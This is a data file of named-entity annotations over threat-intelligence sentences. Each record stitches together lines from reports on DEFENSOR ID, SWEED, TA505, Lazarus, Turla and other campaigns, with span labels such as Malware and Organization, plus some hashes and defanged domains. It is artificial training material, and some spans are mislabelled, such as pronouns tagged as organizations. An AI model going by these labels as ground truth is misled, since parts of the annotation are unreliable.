{"text": "According to its profile at Google Play ( see Figure 2 ) the app reached a mere 10+ downloads . SWEED remains consistent across most of their campaigns in their use of spear-phishing emails with malicious attachments . DDoS malware floods a target 's network-connected service with an excessive number of request at once in order to overload the capacity of the server .", "spans": [{"start": 28, "end": 39, "label": "System"}, {"start": 96, "end": 101, "label": "Organization"}, {"start": 219, "end": 223, "label": "Malware"}, {"start": 224, "end": 231, "label": "Malware"}]}
{"text": "We reported it to Google on May 16 , 2020 and since May 19 , 2020 the app has no longer been available on Google Play . In April 2018 , SWEED began making use of a previously disclosed Office exploit . For example , DeltaAlfa specifies a DDoS bot family identified as Alfa .", "spans": [{"start": 18, "end": 24, "label": "Organization"}, {"start": 106, "end": 117, "label": "System"}, {"start": 136, "end": 141, "label": "Organization"}, {"start": 216, "end": 225, "label": "Indicator"}, {"start": 238, "end": 246, "label": "Malware"}]}
{"text": "The developer name used , GAS Brazil , suggests the criminals behind the app targeted Brazilian users . In May 2018 , campaigns being conducted by SWEED began leveraging another vulnerability in Microsoft Office: CVE-2017-11882 , a remote code execution bug in Microsoft Office that is commonly observed being leveraged in malicious documents used in commodity malware distribution . The naming scheme used by Novetta for the malware identified during Operation Blockbuster consists of at least two identifiers which each identifier coming from the International Civil Aviation Organization ( ICAO ) 's phonetic alphabet ,2 commonly referred to as the NATO phonetic alphabet .", "spans": [{"start": 147, "end": 152, "label": "Organization"}, {"start": 213, "end": 227, "label": "Vulnerability"}, {"start": 410, "end": 417, "label": "Organization"}, {"start": 549, "end": 590, "label": "Organization"}, {"start": 593, "end": 597, "label": "Organization"}]}
{"text": "Apart from including the country \u2019 s name , the app \u2019 s name is probably intended to imply a relationship with the antifraud solution named GAS Tecnologia . We found them targeting countries in the Middle East such as United Arab Emirates and Saudi Arabia , as well as other countries such as India , Japan , Argentina , the Philippines , and South Korea . Loaders are typically responsible for loading a DLL component into memory given that a DLL cannot operate in a standalone mode such as an executable .", "spans": [{"start": 140, "end": 154, "label": "System"}, {"start": 166, "end": 170, "label": "Organization"}, {"start": 405, "end": 408, "label": "System"}, {"start": 444, "end": 447, "label": "System"}]}
{"text": "That security software is commonly installed on computers in Brazil as several banks require it to log into their online banking . Similar to previous campaigns , the JAR was directly attached to emails and used file names such as Order_2018.jar . This report will explore the various installers , uninstallers and loaders Novetta has observed the Lazarus Group using .", "spans": [{"start": 167, "end": 170, "label": "Malware"}, {"start": 231, "end": 245, "label": "System"}, {"start": 285, "end": 295, "label": "Malware"}, {"start": 298, "end": 310, "label": "Malware"}, {"start": 323, "end": 330, "label": "Organization"}, {"start": 348, "end": 361, "label": "Organization"}]}
{"text": "However , there is also an English version of the DEFENSOR ID app ( see Figure 3 ) besides the Portuguese one , and that app has neither geographical nor language restrictions . Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework . This reverse engineering report looks at the RATs and staging malware found within the Lazarus Group 's collection .", "spans": [{"start": 50, "end": 61, "label": "Malware"}, {"start": 211, "end": 217, "label": "Malware"}, {"start": 242, "end": 255, "label": "Vulnerability"}, {"start": 299, "end": 323, "label": "System"}, {"start": 371, "end": 375, "label": "Malware"}, {"start": 380, "end": 387, "label": "Malware"}, {"start": 388, "end": 395, "label": "Malware"}, {"start": 413, "end": 426, "label": "Organization"}]}
{"text": "Playing further off the suggested GAS Tecnologia link , the app promises better security for its users . TA505 is also using FlowerPippi (Backdoor.Win32.FLOWERPIPPI.A) , a new backdoor that we found them using in their campaigns against targets in Japan , India , and Argentina . Regardless of their sophistication or refinement , the malware families within the Lazarus Group 's India and Lima classes perform at a reasonable level for their designed purpose : the introduction and persistence of malware from the Lazarus Group on a victim 's infrastructure .", "spans": [{"start": 34, "end": 48, "label": "System"}, {"start": 105, "end": 110, "label": "Organization"}, {"start": 125, "end": 136, "label": "System"}, {"start": 176, "end": 184, "label": "System"}, {"start": 363, "end": 376, "label": "Organization"}, {"start": 515, "end": 528, "label": "Organization"}]}
{"text": "The description in Portuguese promises more protection for the user \u2019 s applications , including end-to-end encryption . TA505 targeted Middle Eastern countries in a June 11 campaign that delivered more than 90% of the total spam emails to the UAE , Saudi Arabia , and Morroco . While the capabilities for the installers , loaders , and uninstallers in this report are relatively straight forward and single-focused , analysis of these malware families provide further insight into the capabilities of the Lazarus Group .", "spans": [{"start": 121, "end": 126, "label": "Organization"}, {"start": 310, "end": 320, "label": "Malware"}, {"start": 323, "end": 330, "label": "Malware"}, {"start": 337, "end": 349, "label": "Malware"}, {"start": 506, "end": 519, "label": "Organization"}]}
{"text": "Deceptively , the app was listed in the Education section . It fetches the same FlawedAmmyy downloader .msi file , then downloads the FlawedAmmyy payload . The Lazarus Group employs a variety of RATs that operate in both client mode and server mode .", "spans": [{"start": 60, "end": 62, "label": "Organization"}, {"start": 134, "end": 153, "label": "System"}, {"start": 160, "end": 173, "label": "Organization"}, {"start": 195, "end": 199, "label": "Malware"}]}
{"text": "Functionality After starting , DEFENSOR ID requests the following permissions : allow modify system settings permit drawing over other apps , and activate accessibility services . TA505 used Wizard (.wiz) files in this campaign , with FlawedAmmyy RAT as the final payload . The most common communication mode for a RAT is to act as a client to a remote server .", "spans": [{"start": 31, "end": 42, "label": "Malware"}, {"start": 180, "end": 185, "label": "Organization"}, {"start": 191, "end": 210, "label": "System"}, {"start": 235, "end": 250, "label": "System"}, {"start": 315, "end": 318, "label": "Malware"}]}
{"text": "If an unsuspecting user grants these permissions ( see Figure 4 ) , the trojan can read any text displayed in any app the user may launch \u2013 and send it to the attackers . On June 14 , we saw TA505\u2019s campaign still targeting UAE with similar tactics and techniques , but this time , some of the spam emails were delivered via the Amadey botnet . The Lazarus Group employs a variety of RATs and staging malware to conduct cyber operations , many of which contain significant code overlap that points to at least a shared development environment .", "spans": [{"start": 191, "end": 198, "label": "Organization"}, {"start": 329, "end": 342, "label": "System"}, {"start": 349, "end": 362, "label": "Organization"}, {"start": 384, "end": 388, "label": "Malware"}, {"start": 393, "end": 400, "label": "Malware"}, {"start": 401, "end": 408, "label": "Malware"}]}
{"text": "This means the attackers can steal the victim \u2019 s credentials for logging into apps , SMS and email messages , displayed cryptocurrency private keys , and even software-generated 2FA codes . It later delivered an information stealer named EmailStealer , \u201d which stolesimple mail transfer protocol (SMTP) credentials and email addresses in the victim\u2019s machine . While some members within the Romeo and Sierra groups may not implement sound authentication strategies , shift their design focus in abrupt and unusual manners , and fail to understand the pitfalls of distributed command networks , on the whole the families within the Lazarus Group 's collection of RATs and staging malware perform their tasks with surprising effectiveness .", "spans": [{"start": 191, "end": 193, "label": "Organization"}, {"start": 239, "end": 251, "label": "System"}, {"start": 392, "end": 397, "label": "Organization"}, {"start": 402, "end": 415, "label": "Organization"}, {"start": 632, "end": 645, "label": "Organization"}, {"start": 663, "end": 667, "label": "Malware"}, {"start": 672, "end": 679, "label": "Malware"}, {"start": 680, "end": 687, "label": "Malware"}]}
{"text": "The fact the trojan can steal both the victim \u2019 s credentials and also can control their SMS messages and generated 2FA codes means DEFENSOR ID \u2019 s operators can bypass two-factor authentication . On June 18 , the majority of the campaign\u2019s spam emails were sent with the subject , Your RAKBANK Tax Invoice / Tax Credit Note\u201d or Confirmation . This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets Bitcoin users and global financial organizations .", "spans": [{"start": 132, "end": 143, "label": "Malware"}, {"start": 388, "end": 395, "label": "Organization"}, {"start": 416, "end": 422, "label": "System"}, {"start": 473, "end": 486, "label": "Organization"}, {"start": 498, "end": 521, "label": "Organization"}]}
{"text": "This opens the door to , for example , fully controlling the victim \u2019 s bank account . This campaign used the abovementioned .html file , malicious Excel/Word document VBA macro , the FlawedAmmyy payload , and Amadey . This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets financial organizations .", "spans": [{"start": 172, "end": 177, "label": "System"}, {"start": 184, "end": 203, "label": "System"}, {"start": 210, "end": 216, "label": "System"}, {"start": 263, "end": 270, "label": "Organization"}, {"start": 291, "end": 297, "label": "System"}, {"start": 348, "end": 371, "label": "Organization"}]}
{"text": "To make sure the trojan survives a device restart , it abuses already activated accessibility services that will launch the trojan right after start . On June 24 , we found another campaign targeting Lebanon with the ServHelper malware . McAfee Advanced Threat Research analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact .", "spans": [{"start": 217, "end": 227, "label": "Malware"}, {"start": 238, "end": 269, "label": "Organization"}, {"start": 382, "end": 389, "label": "Organization"}, {"start": 400, "end": 413, "label": "Malware"}, {"start": 414, "end": 421, "label": "Malware"}]}
{"text": "Our analysis shows the DEFENSOR ID trojan can execute 17 commands received from the attacker-controlled server such as uninstalling an app , launching an app and then performing any click/tap action controlled remotely by the attacker ( see Figure 5 ) . On June 17 , we observed the campaign\u2019s spam emails delivering malware-embedded Excel files directly as an attachment . McAfee Advanced Threat Research ( ATR ) analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact .", "spans": [{"start": 23, "end": 34, "label": "Malware"}, {"start": 374, "end": 405, "label": "Organization"}, {"start": 408, "end": 411, "label": "Organization"}, {"start": 526, "end": 533, "label": "Organization"}, {"start": 544, "end": 557, "label": "Malware"}, {"start": 558, "end": 565, "label": "Malware"}]}
{"text": "In 2018 , we saw similar behavior , but all the click actions were hardcoded and suited only for the app of the attacker \u2019 s choice . On June 20 , we spotted the campaign\u2019s spam emails delivering .doc and .xls files . Beginning in 2017 , the Lazarus group heavily targeted individuals with spear phishing emails impersonating job recruiters which contained malicious documents .", "spans": [{"start": 147, "end": 149, "label": "Organization"}, {"start": 242, "end": 255, "label": "Organization"}, {"start": 305, "end": 311, "label": "System"}, {"start": 326, "end": 340, "label": "Organization"}]}
{"text": "In this case , the attacker can get the list of all installed apps and then remotely launch the victim \u2019 s app of their choice to either steal credentials or perform malicious actions ( e.g . Nonetheless , these spam emails were not delivered to the UAE or Arabic-speaking users , but to banks in Asian countries such as India , Indonesia , and the Philippines . The use of decoy documents also reveals some of the potential targets of the Lazarus group 's malicious activity , specifically the use spear phishing attacks observed targeting South Korean government and aerospace organizations .", "spans": [{"start": 212, "end": 223, "label": "Malware"}, {"start": 288, "end": 293, "label": "Organization"}, {"start": 374, "end": 389, "label": "Malware"}, {"start": 440, "end": 453, "label": "Organization"}, {"start": 554, "end": 564, "label": "Organization"}, {"start": 569, "end": 592, "label": "Organization"}]}
{"text": "send funds via a wire transfer ) . After our analysis , we found that Proofpoint reported this malware as AndroMut as well . The campaign lasted from April to October and used job descriptions relevant to target organizations , in both English and Korean language .", "spans": [{"start": 56, "end": 58, "label": "Organization"}, {"start": 70, "end": 80, "label": "Organization"}, {"start": 106, "end": 114, "label": "Organization"}]}
{"text": "We believe that this is the reason the DEFENSOR ID trojan requests the user to allow \u201c Modify system settings \u201d . In the campaign that targeted Japan , Philippines , and Argentina on June 20 , we found what seems to be a new , undisclosed malware , which we named Gelup . The Lazarus Group 's objective was to gain access to the target 's environment and obtain key military program insight or steal money .", "spans": [{"start": 39, "end": 50, "label": "Malware"}, {"start": 264, "end": 269, "label": "Malware"}, {"start": 276, "end": 289, "label": "Organization"}]}
{"text": "Subsequently , the malware will change the screen off time-out to 10 minutes . Another new malware we found that TA505 is using in their campaigns last June 20 against targets in Japan , the Philippines , and Argentina is FlowerPippi . In this latest discovery by McAfee , despite a short pause in similar operations , the Lazarus group targets financial organizations .", "spans": [{"start": 113, "end": 118, "label": "Organization"}, {"start": 222, "end": 233, "label": "System"}, {"start": 264, "end": 270, "label": "Organization"}, {"start": 323, "end": 336, "label": "Organization"}, {"start": 345, "end": 368, "label": "Organization"}]}
{"text": "This means that , unless victims lock their devices via the hardware button , the timer provides plenty of time for the malware to remotely perform malicious , in-app operations . The malicious email contains a highly suspicious sample which triggered the ZLAB team to investigate its capabilities and its possible attribution , discovering a potential expansion of the TA505 operation . This campaign is tailored to identifying those who are running Bitcoin related software through specific system scans .", "spans": [{"start": 256, "end": 260, "label": "Organization"}, {"start": 370, "end": 375, "label": "Organization"}, {"start": 451, "end": 458, "label": "System"}]}
{"text": "If the device gets locked , the malware can \u2019 t unlock it . The attack , as stated by CyberInt , leveraged a command and control server located in Germany related to the TA505 actor: a very active group involved in cyber-criminal operation all around the world , threatening a wide range of high profile companies , active since 2014 . This Malware Analysis Report ( MAR ) is the result of analytic efforts between the Department of Homeland Security ( DHS ) and the Federal Bureau of Investigation ( FBI ) .", "spans": [{"start": 170, "end": 175, "label": "Organization"}, {"start": 291, "end": 313, "label": "Organization"}, {"start": 419, "end": 450, "label": "Organization"}, {"start": 453, "end": 456, "label": "Organization"}, {"start": 467, "end": 498, "label": "Organization"}, {"start": 501, "end": 504, "label": "Organization"}]}
{"text": "Malware data leak When we analyzed the sample , we realized that the malware operators left the remote database with some of the victims \u2019 data freely accessible , without any authentication . The comparison of the infection chains reveals in both cases TA505 used a couple of SFX stages to deploy the RMS\u201d software: a legitimate remote administration tool produced by the Russian company TektonIT . When victims open malicious documents attached to the emails , the malware scans for Bitcoin activity and then establishes an implant for long-term data-gathering .", "spans": [{"start": 254, "end": 259, "label": "Organization"}, {"start": 454, "end": 460, "label": "System"}]}
{"text": "The database contained the last activity performed on around 60 compromised devices . The TA505 group is one of the most active threat groups operating since 2014 , it has traditionally targeted Banking and Retail industries , as we recently documented during the analysis of the Stealthy Email Stealer\u201d part of their arsenal . According to trusted third-party reporting , HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace , telecommunications , and finance industries .", "spans": [{"start": 90, "end": 95, "label": "Organization"}, {"start": 195, "end": 202, "label": "Organization"}, {"start": 207, "end": 213, "label": "Organization"}, {"start": 373, "end": 392, "label": "Organization"}, {"start": 416, "end": 425, "label": "Malware"}, {"start": 426, "end": 433, "label": "Malware"}, {"start": 459, "end": 468, "label": "Organization"}, {"start": 471, "end": 489, "label": "Organization"}, {"start": 496, "end": 514, "label": "Organization"}]}
{"text": "We found no other information stolen from the victims to be accessible . Also , some code pieces are directly re-used in the analyzed campaigns , such as the i.cmd and exit.exe files , and , at the same time , some new components have been introduced , for instance the rtegre.exe\u201d and the veter1605_MAPS_10cr0.exe file . The malware is a fully functional RAT with multiple commands that the actors can issue from a command and control ( C2 ) server to a victim 's system via dual proxies .", "spans": [{"start": 158, "end": 163, "label": "Malware"}, {"start": 168, "end": 176, "label": "Malware"}, {"start": 270, "end": 281, "label": "Malware"}, {"start": 290, "end": 314, "label": "Malware"}, {"start": 356, "end": 359, "label": "Malware"}, {"start": 392, "end": 398, "label": "Organization"}, {"start": 438, "end": 440, "label": "System"}]}
{"text": "Thanks to this data leak , we were able to confirm that the malware really worked as designed : the attacker had access to the victims \u2019 entered credentials , displayed or written emails and messages , etc . In 2018 , Kaspersky Labs published a report that analyzed a Turla PowerShell loader that was based on the open-source project Posh-SecMod . FALLCHILL typically infects a system as a file dropped by other HIDDEN COBRA malware or as a file downloaded unknowingly by users when visiting sites compromised by HIDDEN COBRA actors .", "spans": [{"start": 218, "end": 227, "label": "Organization"}, {"start": 268, "end": 273, "label": "Organization"}, {"start": 274, "end": 291, "label": "System"}, {"start": 348, "end": 357, "label": "Malware"}, {"start": 412, "end": 432, "label": "Malware"}, {"start": 513, "end": 532, "label": "Organization"}]}
{"text": "Once we reached the non-secured database , we were able to directly observe the app \u2019 s malicious behavior . Turla is believed to have been operating since at least 2008 , when it successfully breached the US military . HIDDEN COBRA actors use an external tool or dropper to install the FALLCHILL malware to establish persistence .", "spans": [{"start": 109, "end": 114, "label": "Organization"}, {"start": 209, "end": 217, "label": "Organization"}, {"start": 220, "end": 239, "label": "Organization"}, {"start": 247, "end": 260, "label": "Malware"}, {"start": 264, "end": 271, "label": "Malware"}, {"start": 287, "end": 296, "label": "Malware"}, {"start": 297, "end": 304, "label": "Malware"}]}
{"text": "To illustrate the level of threat the DEFENSOR ID app posed , we performed three tests . This is not the first time Turla has used PowerShell in-memory loaders to increase its chances of bypassing security products . HIDDEN COBRA actors install the FALLCHILL malware to establish persistence .", "spans": [{"start": 38, "end": 49, "label": "Malware"}, {"start": 116, "end": 121, "label": "Organization"}, {"start": 131, "end": 141, "label": "System"}, {"start": 217, "end": 236, "label": "Organization"}, {"start": 249, "end": 258, "label": "Malware"}, {"start": 259, "end": 266, "label": "Malware"}]}
{"text": "First , we launched a banking app and entered the credentials there . However , it is likely the same scripts are used more globally against many traditional Turla targets in Western Europe and the Middle East . Working with U.S. government partners , DHS and FBI identified Internet Protocol ( IP ) addresses and other indicators of compromise ( IOCs ) associated with a remote administration tool ( RAT ) used by the North Korean government\u2014commonly known as FALLCHILL .", "spans": [{"start": 158, "end": 163, "label": "Organization"}, {"start": 230, "end": 240, "label": "Organization"}, {"start": 252, "end": 255, "label": "Organization"}, {"start": 260, "end": 263, "label": "Organization"}, {"start": 275, "end": 292, "label": "Indicator"}, {"start": 295, "end": 297, "label": "Indicator"}, {"start": 372, "end": 398, "label": "Malware"}, {"start": 401, "end": 404, "label": "Malware"}, {"start": 461, "end": 470, "label": "Malware"}]}
{"text": "The credentials were immediately available in the leaky database \u2013 see Figure 6 . In some samples deployed since March 2019 , Turla developers modified their PowerShell scripts in order to bypass the Antimalware Scan Interface (AMSI) . This alert 's IOC files provide HIDDEN COBRA indicators related to FALLCHILL .", "spans": [{"start": 126, "end": 131, "label": "Organization"}, {"start": 250, "end": 259, "label": "Indicator"}, {"start": 268, "end": 280, "label": "Organization"}, {"start": 303, "end": 312, "label": "Malware"}]}
{"text": "Figure 6 . Based on our research , SWEED \u2014 which has been operating since at least 2017 \u2014 primarily targets their victims with stealers and remote access trojans . McAfee Advanced Threat Research analysts have uncovered a global data reconnaissance campaign assaulting a wide number of industries including critical infrastructure , entertainment , finance , health care , and telecommunications .", "spans": [{"start": 35, "end": 40, "label": "Organization"}, {"start": 164, "end": 195, "label": "Organization"}, {"start": 307, "end": 330, "label": "Organization"}, {"start": 333, "end": 346, "label": "Organization"}, {"start": 349, "end": 356, "label": "Organization"}, {"start": 359, "end": 370, "label": "Organization"}, {"start": 377, "end": 395, "label": "Organization"}]}
{"text": "The banking app test : the credentials as entered ( left ) and as available in the database ( right ) Second , we wrote a test message in an email client . It is interesting to note that Turla operators used the free email provider GMX again , as in the Outlook Backdoor and in LightNeuron . Because of this , additional HIDDEN COBRA malware may be present on systems compromised with FALLCHILL .", "spans": [{"start": 187, "end": 192, "label": "Organization"}, {"start": 254, "end": 270, "label": "System"}, {"start": 278, "end": 289, "label": "System"}, {"start": 321, "end": 341, "label": "Malware"}, {"start": 385, "end": 394, "label": "Malware"}]}
{"text": "We saw the message uploaded to the attackers \u2019 server within a second \u2013 see Figure 7 . This new research confirms our forecast and shows that the Turla group does not hesitate to use open-source pen-testing frameworks to conduct intrusion . This campaign , dubbed Operation GhostSecret , leverages multiple implants , tools , and malware variants associated with the state-sponsored cyber group HIDDEN COBRA .", "spans": [{"start": 146, "end": 151, "label": "Organization"}, {"start": 207, "end": 217, "label": "System"}, {"start": 395, "end": 407, "label": "Organization"}]}
{"text": "Figure 7 . Neptun is installed on Microsoft Exchange servers and is designed to passively listen for commands from the attackers . From March 18 to 26 we observed the malware operating in multiple LOCs of the world .", "spans": [{"start": 11, "end": 17, "label": "Malware"}, {"start": 90, "end": 109, "label": "Malware"}, {"start": 119, "end": 128, "label": "Organization"}]}
{"text": "The email message test : the message as written ( left ) and as available in the database ( right ) Third , we documented the trojan retrieving the Google Authenticator 2FA code . One attack during this campaign involved the use of infrastructure belonging to another espionage group known as Crambus aka OilRig , APT34 . Furthermore , the Advanced Threat Research team has discovered Proxysvc , which appears to be an undocumented implant .", "spans": [{"start": 148, "end": 168, "label": "System"}, {"start": 293, "end": 300, "label": "Organization"}, {"start": 305, "end": 311, "label": "Organization"}, {"start": 314, "end": 319, "label": "Organization"}, {"start": 340, "end": 364, "label": "Organization"}, {"start": 385, "end": 393, "label": "Malware"}]}
{"text": "Figure 8 . Waterbug has been using Meterpreter since at least early 2018 and , in this campaign , used a modified version of Meterpreter , which was encoded and given a .wav extension in order to disguise its true purpose . Our investigation into this campaign reveals that the actor used multiple malware implants , including an unknown implant with capabilities similar to Bankshot .", "spans": [{"start": 11, "end": 19, "label": "Organization"}, {"start": 35, "end": 46, "label": "System"}, {"start": 125, "end": 136, "label": "System"}, {"start": 278, "end": 283, "label": "Organization"}, {"start": 375, "end": 383, "label": "Malware"}]}
{"text": "The software generated 2FA code as it appeared on the device \u2019 s display ( left ) and as available in the database ( right ) Along with the malicious DEFENSOR ID app , another malicious app named Defensor Digital was discovered . In all likelihood , Waterbug\u2019s use of Crambus infrastructure appears to have been a hostile takeover . The attackers behind Operation GhostSecret used a similar infrastructure to earlier threats , including SSL certificates used by FakeTLS in implants found in the Destover backdoor variant known as Escad , which was used in the Sony Pictures attack .", "spans": [{"start": 196, "end": 212, "label": "Malware"}, {"start": 250, "end": 260, "label": "Organization"}, {"start": 268, "end": 290, "label": "System"}, {"start": 337, "end": 346, "label": "Organization"}, {"start": 437, "end": 453, "label": "Malware"}, {"start": 462, "end": 469, "label": "Malware"}, {"start": 495, "end": 512, "label": "Malware"}, {"start": 530, "end": 535, "label": "Malware"}]}
{"text": "Both apps shared the same C & C server , but we couldn \u2019 t investigate the latter as it had already been removed from the Google Play store . One of the most interesting things to occur during one of Waterbug\u2019s recent campaigns was that during an attack against one target in the Middle East , Waterbug appeared to hijack infrastructure from the Crambus espionage group and used it to deliver malware on to the victim\u2019s network . Based on our analysis of public and private information from submissions , along with product telemetry , it appears Proxysvc was used alongside the 2017 Destover variant and has operated undetected since mid-2017 .", "spans": [{"start": 122, "end": 139, "label": "System"}, {"start": 200, "end": 210, "label": "Organization"}, {"start": 294, "end": 302, "label": "Organization"}, {"start": 364, "end": 369, "label": "Organization"}, {"start": 547, "end": 555, "label": "Malware"}, {"start": 584, "end": 592, "label": "Malware"}]}
{"text": "Indicators of Compromise ( IoCs ) Package Name Hash ESET detection name com.secure.protect.world F17AEBC741957AA21CFE7C7D7BAEC0900E863F61 Android/Spy.BanBra.A com.brazil.android.free EA069A5C96DC1DB0715923EB68192FD325F3D3CE Android/Spy.BanBra.A MITRE ATT & CK techniques Tactic ID Name Description Initial Access T1475 Deliver Malicious App These three recent Waterbug campaigns have seen the group compromise governments and international organizations across the globe in addition to targets in the IT and education sectors . This new variant resembles parts of the Destover malware , which was used in the 2014 Sony Pictures attack .", "spans": [{"start": 52, "end": 56, "label": "Organization"}, {"start": 72, "end": 96, "label": "Indicator"}, {"start": 97, "end": 137, "label": "Indicator"}, {"start": 138, "end": 158, "label": "Indicator"}, {"start": 159, "end": 182, "label": "Indicator"}, {"start": 183, "end": 223, "label": "Indicator"}, {"start": 224, "end": 244, "label": "Indicator"}, {"start": 245, "end": 250, "label": "Organization"}, {"start": 360, "end": 368, "label": "Organization"}, {"start": 393, "end": 398, "label": "Organization"}, {"start": 399, "end": 421, "label": "Organization"}, {"start": 426, "end": 453, "label": "Organization"}, {"start": 501, "end": 503, "label": "Organization"}, {"start": 508, "end": 525, "label": "Organization"}, {"start": 568, "end": 576, "label": "Malware"}, {"start": 577, "end": 584, "label": "Malware"}]}
{"text": "via Authorized App Store Impersonates security app on Google Play . Curiously though , Waterbug also compromised other computers on the victim\u2019s network using its own infrastructure . The Lazarus used a similar infrastructure to earlier threats , including the Destover backdoor variant known as Escad .", "spans": [{"start": 15, "end": 24, "label": "System"}, {"start": 54, "end": 65, "label": "System"}, {"start": 87, "end": 95, "label": "Organization"}, {"start": 167, "end": 181, "label": "Organization"}, {"start": 188, "end": 195, "label": "Organization"}, {"start": 261, "end": 278, "label": "Malware"}, {"start": 296, "end": 301, "label": "Malware"}]}
{"text": "T1444 Masquerade as Legitimate Application Impersonates legitimate GAS Tecnologia application . Symantec believes that the variant of Mimikatz used in this attack is unique to Waterbug . The McAfee Advanced Threat Research team discovered a previously unknown data-gathering implant that surfaced in mid-February 2018 .", "spans": [{"start": 67, "end": 81, "label": "System"}, {"start": 96, "end": 104, "label": "Organization"}, {"start": 134, "end": 142, "label": "System"}, {"start": 176, "end": 184, "label": "Organization"}, {"start": 191, "end": 222, "label": "Organization"}, {"start": 260, "end": 282, "label": "Indicator"}]}
{"text": "Discovery T1418 Application Discovery Sends list of installed apps on device . Aside from the attack involving Crambus infrastructure , this sample of Mimikatz has only been seen used in one other attack , against an education target in the UK in 2017 . The Advanced Threat Research team uncovered activity related to this campaign in March 2018 , when the actors targeted Turkish banks .", "spans": [{"start": 151, "end": 159, "label": "System"}, {"start": 217, "end": 226, "label": "Organization"}, {"start": 258, "end": 282, "label": "Organization"}, {"start": 357, "end": 363, "label": "Organization"}, {"start": 381, "end": 386, "label": "Organization"}]}
{"text": "Impact T1516 Input Injection Can enter text and perform clicks on behalf of user . The first observed evidence of Waterbug activity came on January 11 , 2018 , when a Waterbug-linked tool (a task scheduler named msfgi.exe) was dropped on to a computer on the victim\u2019s network . KONNI : A Malware Under The Radar For Years .", "spans": [{"start": 114, "end": 122, "label": "Organization"}, {"start": 278, "end": 283, "label": "Malware"}, {"start": 306, "end": 311, "label": "System"}]}
{"text": "Collection T1417 Input Capture Records user input data . In the case of the attack against the Middle Eastern target , Crambus was the first group to compromise the victim\u2019s network , with the earliest evidence of activity dating to November 2017 . Talos has discovered an unknown Remote Administration Tool that we believe has been in use for over 3 years .", "spans": [{"start": 119, "end": 126, "label": "Organization"}, {"start": 249, "end": 254, "label": "Organization"}, {"start": 281, "end": 307, "label": "Malware"}]}
{"text": "Command and Control T1437 Standard Application Layer Protocol Uses Firebase Cloud Messaging for C & C . Waterbug\u2019s intrusions on the victim\u2019s network continued for much of 2018 . During this time it has managed to avoid scrutiny by the security community .", "spans": [{"start": 104, "end": 114, "label": "Organization"}]}
{"text": "Riltok mobile Trojan : A banker with global reach 25 JUN 2019 Riltok is one of numerous families of mobile banking Trojans with standard ( for such malware ) functions and distribution methods . Symantec did not observe the initial access point and the close timeframe between Waterbug observed activity on the victim\u2019s network and its observed use of Crambus infrastructure suggests that Waterbug may have used the Crambus infrastructure as an initial access point . The current version of the malware allows the operator to steal files , keystrokes , perform screenshots , and execute arbitrary code on the infected host .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 62, "end": 68, "label": "Malware"}, {"start": 195, "end": 203, "label": "Organization"}, {"start": 277, "end": 285, "label": "Organization"}, {"start": 389, "end": 397, "label": "Organization"}, {"start": 416, "end": 438, "label": "Organization"}]}
{"text": "Originally intended to target the Russian audience , the banker was later adapted , with minimal modifications , for the European \u201c market. \u201d The bulk of its victims ( more than 90 % ) reside in Russia , with France in second place ( 4 % ) . It also reconfigures the Microsoft Sysinternals registry to prevent pop-ups when running the PsExec tool . Talos has named this malware KONNI .", "spans": [{"start": 335, "end": 346, "label": "System"}, {"start": 349, "end": 354, "label": "Organization"}, {"start": 378, "end": 383, "label": "Malware"}]}
{"text": "Third place is shared by Italy , Ukraine , and the United Kingdom . Waterbug also used an older version of PowerShell , likely to avoid logging . Throughout the multiple campaigns observed over the last 3 years , the actor has used an email attachment as the initial infection vector .", "spans": [{"start": 68, "end": 76, "label": "Organization"}, {"start": 107, "end": 117, "label": "System"}]}
{"text": "We first detected members of this family back in March 2018 . In one of these campaigns , Waterbug used a USB stealer that scans removable storage devices to identify and collect files of interest . They then use additional social engineering to prompt the target to open a .scr file , display a decoy document to the users , and finally execute the malware on the victim's machine .", "spans": [{"start": 90, "end": 98, "label": "Organization"}, {"start": 106, "end": 117, "label": "System"}, {"start": 274, "end": 278, "label": "Indicator"}]}
{"text": "Like many other bankers , they were disguised as apps for popular free ad services in Russia . The malware then uses WebDAV to upload the RAR archive to a Box account . The malware infrastructure of the analysed samples was hosted by a free web hosting provider: 000webhost .", "spans": [{"start": 99, "end": 106, "label": "Malware"}, {"start": 117, "end": 123, "label": "System"}, {"start": 138, "end": 149, "label": "Malware"}]}
{"text": "The malware was distributed from infected devices via SMS in the form \u201c % USERNAME % , I \u2019 ll buy under a secure transaction . The DeepSight Managed Adversary and Threat Intelligence (MATI) team co-authored this blog and its customers have received intelligence with additional details about these campaigns , the characteristics of the Waterbug (aka Turla) cyber espionage group , and methods of detecting and thwarting activities of this adversary . The malware has evolved over time .", "spans": [{"start": 131, "end": 158, "label": "Organization"}, {"start": 163, "end": 182, "label": "Organization"}, {"start": 337, "end": 345, "label": "Organization"}, {"start": 374, "end": 379, "label": "Organization"}]}
{"text": "youlabuy [ . The DeepSight MATI team authored this blog and its customers have received intelligence with additional details about these campaigns , the characteristics of the Waterbug (aka Turla) cyber espionage group , and methods of detecting and thwarting activities of this adversary . In this article , we will analyse this evolution: at the beginning the malware was only an information stealer without remote administration , it moved from a single file malware to a dual file malware (an executable and a dynamic library ) , the malware has supported more and more features over the time , the decoy documents have become more and more advanced .", "spans": [{"start": 0, "end": 12, "label": "Indicator"}, {"start": 17, "end": 36, "label": "Organization"}, {"start": 176, "end": 184, "label": "Organization"}, {"start": 213, "end": 218, "label": "Organization"}, {"start": 514, "end": 529, "label": "System"}]}
{"text": "] ru/7 * * * * * 3 \u201d or \u201c % USERNAME % , accept 25,000 on Youla youla-protect [ . While reviewing a 2015 report\u2075 of a Winnti intrusion at a Vietnamese gaming company , we identified a small cluster of Winnti\u2076 samples designed specifically for Linux\u2077 . The different versions contain copy/pasted code from previous versions .", "spans": [{"start": 64, "end": 81, "label": "Indicator"}, {"start": 118, "end": 124, "label": "Organization"}, {"start": 140, "end": 165, "label": "Organization"}, {"start": 201, "end": 208, "label": "Organization"}]}
